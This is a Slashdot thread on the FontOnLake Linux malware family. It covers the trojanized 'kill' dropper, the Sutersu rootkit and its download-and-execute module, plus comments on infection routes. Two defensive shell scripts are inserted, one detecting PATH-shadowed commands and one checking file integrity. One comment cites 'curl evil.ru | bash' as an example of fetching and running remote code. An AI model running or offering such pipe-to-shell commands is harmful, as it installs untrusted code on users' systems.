New 'FontOnLake' Malware Family Can Target Linux Systems (securityweek.com)

Security Week reports: A previously unknown, modular malware family that targets Linux systems has been used in targeted attacks to collect credentials and gain access to victim systems, ESET reported on Thursday. Dubbed FontOnLake, the malware family employs a rootkit to conceal its presence and uses different command and control servers for each sample, which shows how careful its operators are to maintain a low profile.

What's more, the malware developers are constantly modifying the FontOnLake modules, and use three categories of components that have been designed to work together, namely trojanized applications, backdoors, and rootkits.

Evidence suggests that FontOnLake has been used in attacks aimed at organizations in Southeast Asia. The first malware samples related to this family emerged last May. The malware was previously described by Avast and Lacework as the HCRootkit / Sutersu Linux rootkit, as well as by Tencent Security Response Center in a February report.

The various trojanized applications that ESET's researchers have identified during their investigation are used to load custom backdoor or rootkit modules, but also to collect sensitive data when needed. Posing as standard Linux utilities, these files were also designed to achieve persistence on the compromised systems. What the researchers haven't figured out yet is the manner in which the trojanized applications are delivered to the victims. ESET's analysis of FontOnLake has revealed the use of three different backdoors, all written in C++, all using the same Asio library from Boost, and all capable of exfiltrating sshd credentials and bash command history.

The simplest of the three was designed to launch and mediate access to a local SSH server, update itself, and transmit collected credentials. The malware appears to be under development.

The second backdoor was also capable of file manipulation, updating itself, and uploading and downloading files, according to the article, while the third backdoor "accepts remote connections, serves as a proxy and can download and run Python scripts, in addition to exfiltrating credentials."
  • It's a sign (Score:4, Funny)

    by JustAnotherOldGuy ( 4145623 ) on Sunday October 10, 2021 @12:45PM (#61877735) Journal

    It's a sign that Linux is in fact gaining some foothold on the desktop if malware authors are actually taking the time to write Linux malware.

    It's not the sign I'd like, but it's an unmistakable sign nonetheless.

    Maybe someday, god willing, we Linux users will have the same rich, full-featured malware that Windows users have available to them.

    • Maybe someday, god willing, we Linux users will have the same rich, full-featured malware that Windows users have available to them.

      Yes, god can be a dick like that.

    • It's not the first, and it's not the first time that Linux has been shown to not be invulnerable to malware; unlike what knobs like to chirp on about.

      • ...Linux has been shown to not be invulnerable to malware....

        Writing malware for Linux has never been particularly hard. Getting it to automatically spread, though, is damned hard. Social engineering is, by far, the easiest route to spread Linux malware, as human security is much more lax than Linux's security.

        • The same applies to Windows and Mac. Social engineering is by far the most common and simple vector; spreading via the OS is damn hard and pretty rare nowadays.
  • From TFA ... (Score:4, Informative)

    by PPH ( 736903 ) on Sunday October 10, 2021 @12:57PM (#61877757)

    Posing as standard Linux utilities

    Name them.

    What the researchers haven't figured out yet is the manner in which the trojanized applications are delivered to the victims.

    If the utilities in question were named, a smart person would have some idea as to how these came to be present on the targeted systems.

    I suspect that the compromised utilities are something that is typically run with root permissions. Possibly at startup. And are big enough hairballs of code to discourage examination by all but the bravest of souls. But since these utilities are among Those That Shall Not Be Named, we will all have to wait patiently for some wizard to clean the mess up for us.

    • by goombah99 ( 560566 ) on Sunday October 10, 2021 @01:14PM (#61877797)

      All the articles one reads conflate four distinctly different things.

      1. A theoretical OS vulnerability exists.
      2. There is a way to exploit this to achieve security hole X (e.g. harvesting SSH credentials)
      3. There exists a tool chain that actualizes this
      4. There exists a mode or channel that can get this executable run on a computer.

      When the latter is "remote exploit" it's interesting. When the latter is "User installs some malware themselves with user-land credentials" it's Yawn. It gets incrementally more exciting when the malware manages a hat trick of getting more privileges or persistence than you'd have thought possible due to some system level bug.

    • Re:From TFA ... (Score:4, Insightful)

      by Kremmy ( 793693 ) on Sunday October 10, 2021 @01:19PM (#61877813)
      I don't know why you suspect it when you could have just read the paper they linked.
  • by fahrbot-bot ( 874524 ) on Sunday October 10, 2021 @01:12PM (#61877791)

    FontOnLake has revealed the use of three different backdoors, all written in C++ ...

    C++ is currently 4th, but may be moving up on the TIOBE index [tiobe.com] ... :-)

  • by techno-vampire ( 666512 ) on Sunday October 10, 2021 @03:16PM (#61878109) Homepage
    Are any of these infected packages available through the standard repos for their distros? If not, people would have to download them from j.random.website.com and install them manually, and if that's what they're doing, I have no sympathy for them whatsoever. In the Linux world, the standard repos exist exactly to prevent things like this.
  • Naming the utilities affected would be a nice start....

  • Actual details. (Score:5, Informative)

    by Gravis Zero ( 934156 ) on Sunday October 10, 2021 @11:45PM (#61879251)

    If you follow the links in the PDF the article links then you get to a few different sites.

    Tencent has a write up in Chinese: https://security.tencent.com/i... [tencent.com]

    I rewrote the machine translation a bit:
    Mode of Infection

    It appears the attacker first obtains access to a vulnerable server and then jumps to others by pushing the ELF dropper (kill) using scp to machines accessible through the compromised server, infiltrates, and repeats the process.

    Note: A dropper is a kind of Trojan that has been designed to "install" some sort of malware (virus, backdoor, etc.) to a target system. The malware code is contained within the dropper (single-stage) and (in this case) is compressed using UPX to evade detection by virus scanners.

    Lacework has a good overview: https://www.lacework.com/blog/... [lacework.com]

    Important snippets:

    The ELF dropper is a modified version of the coreutils “kill” binary. The majority of the “kill” binary’s core functionality remains the same, but with the addition of writing two ELF files to disk during execution. One of these components is a userland binary and the other a kernel module identified by Avast as the Sutersu rootkit. Notably, figures 0 and 1 show the ELF dropper and kernel rootkit had low or non-existent detection rates on VirusTotal.

    Given the underlying backdoor coreutils utility is kill, it is not uncommon for the legitimate usage of this utility to be executed via “sudo kill” when terminating privileged processes. Executing with sudo results in appropriate permissions to both install the kernel module and write to the privileged location in /proc/.

    The kernel module as pointed out by Avast is the open-source rootkit “Sutersu” [github.com]. This rootkit has wide kernel version support, as well as supporting multiple architectures including x86, x86_64, and ARM. Sutersu supports file, port, and process hiding, as one would expect from a rootkit. Sutersu also supports functionality beyond process and file hiding in the form of additional modules that are specified during compile time.

    At the time of this writing, these additional modules include a keylogger, a module to download and execute (DLEXEC) a binary upon a given event, and an ICMP module to monitor for specific “magic bytes” before triggering an event. The DLEXEC and ICMP module can be used together to trigger the downloading and execution of a binary when a specific ICMP packet is received. They also can be used independently. Lacework labs identified multiple Sutersu kernel modules with various modules and external IPs.

    • Thank you. How does this malicious kill replace the system kill in the first place? Is it installed in the user's PATH? System file?

      Specifically, are Linux machines at risk of `yum update` or at risk of `curl evil.ru | bash`?

      • Thank you. How does this malicious kill replace the system kill in the first place? Is it installed in the user's PATH? System file?

        It's pushed via scp using stolen creds (keylogger and/or auth keys) from the current server. No idea where it pushes itself but it would make sense that it pushes to a user directory since if it could push it to the system level then it wouldn't even need to bother waiting for someone to use it.
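The reply above guesses that the dropper lands in a user directory and waits for someone to run it. One concrete way that works is a copy of `kill` sitting in a user-writable directory that precedes /usr/bin in PATH. The script below is an added example, not code from the page, ESET, Lacework or Tencent: it walks a PATH value in order and reports every command name that an earlier directory provides ahead of a later one. The directory layout and file contents in `demo` are constructed for illustration; it assumes a POSIX sh with `awk` and `mktemp`.

```shell
#!/bin/sh
# Added example: report commands shadowed by an earlier PATH entry.
# Not the page's, ESET's, Lacework's or Tencent's code; the directories and
# files created in demo() are constructed purely for illustration.
set -u

# Walk $1 (a colon-separated PATH-style list) in order. For every executable
# name, remember the first directory that provides it; when a later directory
# provides the same name, print which earlier copy hides it.
find_shadowed() {
    seen=$(mktemp)
    old_ifs=$IFS; IFS=:; set -- $1; IFS=$old_ifs   # split the list on ':'
    for d in "$@"; do
        [ -d "$d" ] || continue
        for f in "$d"/*; do
            [ -f "$f" ] && [ -x "$f" ] || continue
            name=${f##*/}
            first=$(awk -F'\t' -v n="$name" '$1 == n { print $2; exit }' "$seen")
            if [ -z "$first" ]; then
                printf '%s\t%s\n' "$name" "$d" >> "$seen"
            elif [ "$first" != "$d" ]; then
                printf 'SHADOWED %s: %s/%s hides %s/%s\n' "$name" "$first" "$name" "$d" "$name"
            fi
        done
    done
    rm -f "$seen"
}

# Constructed scenario: a user bin directory ahead of the system one, holding
# a look-alike "kill" that the system copy never gets a chance to answer for.
demo() {
    work=$(mktemp -d)
    mkdir -p "$work/home/bin" "$work/usr/bin"
    printf '#!/bin/sh\necho real kill\n' > "$work/usr/bin/kill"
    printf '#!/bin/sh\necho real cat\n'  > "$work/usr/bin/cat"
    printf '#!/bin/sh\necho not kill\n'  > "$work/home/bin/kill"
    chmod 755 "$work/usr/bin/kill" "$work/usr/bin/cat" "$work/home/bin/kill"
    find_shadowed "$work/home/bin:$work/usr/bin"
    rm -rf "$work"
}

if [ "${1:-}" = "--demo" ]; then demo; fi
```

Run it with `--demo` to see the constructed case, or call `find_shadowed "$PATH"` on a real shell to audit your own lookup order; `which -a kill` is the quick manual equivalent for a single name. Keep in mind that on distributions whose sudoers sets `secure_path`, `sudo kill` ignores the user's PATH, so a shadowing binary in a home directory would only be reached by an unprivileged invocation or by a sudo configuration that keeps the caller's PATH.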

    • Installing a compromised /usr/bin/kill is just the sort of thing integrity checking programs like Tripwire and others (AIDE, OSSEC) were designed to defeat. And you can generate a list of known hashes from the signed package meta data in most distros, or generate new ones automatically when installing. Of course the original hole is a problem, but making intrusion easier to detect and harder to exploit is desirable. Tripwire is 20 year old technology, there are far better alternatives but it's straight forw
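As an added illustration of the integrity-checking idea in the comment above (this is example code, not Tripwire, AIDE or OSSEC, and not from the page): record a SHA-256 and a permission mode for every regular file under a directory, then report files whose content or mode changed, files that appeared, and files that vanished. It assumes GNU coreutils (`sha256sum`, `stat -c %a`) and a POSIX sh with `awk`; the files written by `demo` are constructed to stand in for a replaced /usr/bin/kill and a dropped module.

```shell
#!/bin/sh
# Added example: a minimal Tripwire/AIDE-style file integrity baseline.
# Assumes GNU coreutils (sha256sum, stat -c). Not the page's or any tool's code;
# the tree built in demo() is constructed for illustration only.
set -u

# Write one "path<TAB>sha256<TAB>mode" line per regular file under $1 into $2.
build_baseline() {
    find "$1" -type f | LC_ALL=C sort | while IFS= read -r f; do
        printf '%s\t%s\t%s\n' "$f" "$(sha256sum "$f" | cut -d' ' -f1)" "$(stat -c %a "$f")"
    done > "$2"
}

# Succeed if manifest $1 has an entry whose path field is exactly $2.
has_path() {
    awk -F'\t' -v p="$2" '$1 == p { found = 1 } END { exit !found }' "$1"
}

# Compare directory $1 against baseline manifest $2. Prints one line per
# finding (MODIFIED / MISSING / ADDED) and returns 1 if anything was found.
verify_baseline() {
    current=$(mktemp); findings=0; tab=$(printf '\t')
    build_baseline "$1" "$current"
    while IFS= read -r entry; do                 # every baseline entry ...
        path=${entry%%"$tab"*}
        if grep -qxF -- "$entry" "$current"; then
            :                                    # identical hash and mode
        elif has_path "$current" "$path"; then
            printf 'MODIFIED %s\n' "$path"; findings=1
        else
            printf 'MISSING %s\n' "$path"; findings=1
        fi
    done < "$2"
    while IFS= read -r entry; do                 # ... and anything new on disk
        path=${entry%%"$tab"*}
        has_path "$2" "$path" || { printf 'ADDED %s\n' "$path"; findings=1; }
    done < "$current"
    rm -f "$current"
    return $findings
}

# Constructed scenario: baseline a small bin directory, then overwrite "kill"
# and drop a new file, the way a dropper would, and verify.
demo() {
    work=$(mktemp -d)
    mkdir -p "$work/bin"
    printf 'legit kill\n' > "$work/bin/kill"
    printf 'legit cat\n'  > "$work/bin/cat"
    build_baseline "$work/bin" "$work/baseline.tsv"
    printf 'trojanized kill\n' > "$work/bin/kill"
    printf 'dropped module\n'  > "$work/bin/sutersu.ko"
    if verify_baseline "$work/bin" "$work/baseline.tsv"; then rc=0; else rc=1; fi
    rm -rf "$work"
    return $rc
}

if [ "${1:-}" = "--demo" ]; then demo; fi
```

The baseline is only as trustworthy as where it is stored: keep the manifest on read-only or off-host media, because a dropper that can overwrite /usr/bin/kill can overwrite a manifest kept beside it. For packaged files the distro already ships the reference hashes the comment mentions, so `rpm -Va` or `dpkg --verify` gives a comparable report without building your own baseline; a kernel-level rootkit that hides files can still lie to both, which is why the comparison is best run from a clean boot or a mounted image.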

  • Including some utility names (cat, kill, sftp, sshd are named), but not much more: https://www.bleepingcomputer.c... [bleepingcomputer.com]
  • by takionya ( 7833802 ) on Monday October 11, 2021 @10:59AM (#61880397)
    a. Go to an unverified site.

    b. Download some unknown software.

    c. Run said software as root.
  • Sad, watching a once proud and respected tech forum reduced to shilling for the MICROS~1 organization.
